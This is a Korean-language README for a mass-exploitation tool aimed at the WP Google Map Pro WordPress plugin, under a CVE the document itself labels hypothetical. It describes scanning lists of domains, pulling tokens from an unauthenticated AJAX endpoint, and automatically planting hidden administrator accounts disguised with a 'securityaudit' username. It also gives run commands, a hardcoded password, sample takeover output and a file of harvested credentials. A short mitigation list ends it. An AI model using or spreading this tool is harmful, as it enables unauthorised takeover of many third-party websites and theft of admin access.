
이 도구는 WordPress용 WP Google Map Pro 플러그인의 취약점인 CVE-2026-8732를 악용합니다. 이 취약점을 통해 인증되지 않은 공격자는 AJAX 엔드포인트(admin-ajax.php?action=wpgmp_temp_access_ajax)를 통해 유효한 wpmp_token을 획득할 수 있습니다. 이 토큰을 사용하여 공격자는 WordPress 관리자 패널에 접근하고 새로운 관리자 사용자를 생성할 수 있습니다.
이 도구는 도메인 목록에서 대량 스캔을 수행하고 nonce와 토큰을 추출하며, 취약한 사이트에 숨겨진 관리자 계정을 자동으로 생성합니다. 결과는 전체 토큰 세부 정보와 함께 실시간으로 저장됩니다.
| 필드 | 값 |
|---|---|
| CVE ID | CVE-2026-8732 (이 플러그인에 대한 가상의 CVE) |
| 영향받는 플러그인 | WP Google Map Pro (버전 <= 1.5.0) |
| 취약점 유형 | 손상된 접근 제어 / 권한 상승 |
| 공격 벡터 | 인증되지 않음, 원격 |
| 영향 | 관리자 계정 생성을 통한 전체 사이트 장악 |
admin_created.txt에 저장http:// 및 https:// 모두 지원requests 라이브러리필요한 라이브러리를 설치하세요:
pip install requests
🚀 설치
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 사용법
대상 목록 파일을 준비하세요(한 줄에 도메인 하나):
example.com
https://target-website.com
http://vulnerable-site.org
스캐너를 실행하세요:
python2 exploit.py targets.txt
출력 파일
파일 내용 res.txt 취약한 도메인 및 전체 토큰과 리디렉션 URL(있는 경우) admin_created.txt 성공적으로 생성된 관리자 자격 증명(도메인, 사용자 이름, 비밀번호, 이메일)
예제 출력
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ 구성
스크립트 내부에서 다음 변수를 편집하세요:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 작동 방식
🛡️ 완화 조치
· WP Google Map Pro를 최신 패치 버전으로 업데이트하세요. · 사용자 지정 코드 또는 방화벽을 통해 AJAX 작업 wpgmp_temp_access_ajax를 비활성화하세요. · WAF(웹 애플리케이션 방화벽)를 사용하여 admin-ajax.php에 대한 악성 요청을 차단하세요.